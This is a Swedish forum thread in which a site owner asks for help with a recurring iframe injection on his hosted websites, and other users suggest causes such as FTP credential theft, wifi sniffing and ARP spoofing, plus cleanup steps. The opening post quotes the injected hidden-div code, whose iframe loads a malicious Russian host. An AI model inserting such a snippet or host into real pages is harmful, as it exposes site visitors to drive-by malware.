[znap]

Tjenare!

Något riktigt otäckt har hänt mig. För ett par dagar sedan märkte jag denna besynnerliga, och förmodligen otäcka, kod på ett par av mina webbplatser som ligger på surftown.

Kod:

<div style="display:none">fnlfxwewpykjqeqkklbdommqprscveo</div>
<div style="display:none">thtmytmyzpadfwxtflgzbwxsaymwgjo<iframe width=360 height=706 src="http://hochesh-li.ru:8080/index.php" ></iframe></div>

Jag raderade omgående koden men så igår dök den upp igen. Jag tänkte då att det kanske ligger ett spionprogram på min dator som kollar upp min ftp-historik och sedan skriver till index-filerna på de ftp-konton jag nyligen använt (kanske låter helt sjukt men vad ska man tro..?). Jag tömde i varje fall min ftp-historik och radera koden på nytt. Idag så är koden där igen!! Jag är även rädd att det orsakat att jag kickats ut från google dessutom

Jag tycker det är något konstigt att den bara skriver till mina sajter som ligger på surftown, har använt samma ftp-klient till andra hostar och där har ingen ryss varit framme. Kan det vara så illa att surftown har problem med trojanprogram?

Eller ligger problemet på min dator? Någon som har något bra tips på ett anti-spyware program som kan hjälpa mig ur knipan?

mvh Vic

[Clarence]

Problemet kan både ligga på din sajt (de kommer in via ett script, kanske ett du skapat eller något de lyckats ladda upp på ett eller annat sätt) eller på din dator (spyware som kollar dina ftp-uppgifter, möjligtvis att de filtrerar på t ex surftown osv då de vet att det är ett webbhotell).

Har du någon annan dator du kan använda, samt byta lösenord till ftp-servern och du därefter kan göra dina ändringar ifred så är det förmodligen bara spyware på din dator.

I annat fall kan det mycket väl vara båda två.

I tråden http://www.wn.se/t1038077-15-2.html ligger lite tips från praktiskt erfarenhet i sista inlägget. Får du tag i något antivirus som lyckas tala om vad programvaran heter kan du nog hitta bra instruktioner för att bli av med det genom Google annars.

[Zedrick]

På mitt förra jobb (som sysadmin på ett webhotell) såg jag massor av kunder varje vecka som drabbades av detta, och jag antog att det berodde på infektioner i deras datorer.

Men så hände det mig, trots att jag är ordentligt säkerhetsmedveten och inte använder windows till något utvecklingsrelaterat. En av mina privata sidor fick i sig lite iframes (ftp'ade från Kina), och den enda förklaringen jag kan tänka mig var att lösenordet snappades upp när jag nån dag innan satt uppkopplad på ett SJ-tåg över deras okrypterade wifi-tjänst (och förklaringen till det var att jag hade druckit en massa öl. Lång resa). Det är knappast någon som satt och avsiktligt dumpade trafik på just det tåget för att skicka datan vidare till Kinesiska bots, men det finns säkert någon form av spyware som även klarar av att scanna okrypterad trådlös trafik. Nån bättre förklaring har jag inte kommit på.

Men hursomhelst, tror fortfarande att 99% beror på någon form av spyware i klientdatorn (fick förresten också det bekräftat av flera kunder som rensat ut spyware efter incidenten. Tyvärr kommer jag inte ihåg om de använt nått specifikt program för det som kan rekommenderas).

[Mortekai]

Några andra med samma problem:

Citat:

The site hxxp://hochesh-li.ru has been hosting malicious software and this software has infested 2324 domains e.g. adrialand.fr/, numning.info/, plates.gen.tr/. At the moment there is a network error accessing the requested URL: empty response.
Update your Joomla! 1.5 - Open Source Content Management, which is at the crux of your infection

http://forum.avast.com/index.php?topic=49030.0

Malware warnings:
http://www.malwareurl.com/listing.php?domain=bionaft.ru

[emilv]

Citat:

Ursprungligen postat av Zedrick

På mitt förra jobb (som sysadmin på ett webhotell) såg jag massor av kunder varje vecka som drabbades av detta, och jag antog att det berodde på infektioner i deras datorer.
...

Jag kan bekräfta den här bilden. Dessa hack läggs väldigt ofta in via FTP, och inte bara i Joomla och Wordpress (två system som kör FTP internt, vilket gör en säkerhetshlucka extra riskabel). Det har drabbat sajter helt utan interaktiv kod, och FTP-loggarna verifierar att det skett via en korrekt inloggning på FTP.

Det här har även drabbat Mac-användare och kunder som vid en (uppdaterad) virussökning inte hittat några virus alls. Därför är det troligt att det finns virus som även sniffar på nätverket för att snappa upp FTP-uppgifter. Det är lätt att läsa av uppgifter som skickas från andra datorer på det interna nätverket, och jag kan även intyga att det är enkelt att göra det på SJ:s tåg...

[BarateaU]

Fast sniffa behövs då "man in the middle" attack, då trafiken inte passerar ens dator annars, om inte "SJ" använder hubbar
Väldigt spännande och "high tech" bot som sniffar wifi/bt nät och skickar iväg intressant info, låter inte som en omöjlig och otrolig sak.
Zombie datorer som i sin tur ligger och sniffar andras datorer

Haft problem med iframe också på en sida jag hade, ändrade allt men kom tillbaka alla fall.

[Jan Eriksson]

Kanske har något med detta att göra?

http://www.idg.se/2.1085/1.256951/sq...ker-pa-uppgang

[emilv]

Citat:

Ursprungligen postat av BarateaU

Fast sniffa behövs då "man in the middle" attack, då trafiken inte passerar ens dator annars, om inte "SJ" använder hubbar
Väldigt spännande och "high tech" bot som sniffar wifi/bt nät och skickar iväg intressant info

Det är lätt att ARP-spoofa nätet, dvs ropa ut att "hej, jag är en switch och trafik till dessa IP-adresser ska gå via mig". Detta kan leda om trafiken även i ett switchat nät så att den går via ens egen dator. Det behöver alltså inte alls vara i den trådlösa kommunikationen.

[Slacker]

Här finns en intressant artikel om fenomenet med iframe attacker.
http://rzaman.com/remove-iframe-hack/
Jag har installerat gratisprogrammet Keepass för att kryptera mina lösenord och för att stoppa keyloggers för de ger en skyddad inloggning via Auto-typing. Jag har slutat att ftp:a dagligen från Windows utan skall använda One.coms ftp-program via webben istället eller så köra ftp från Mandriva Linux som jag kan boota till. Linux borde vara säkrare att använda.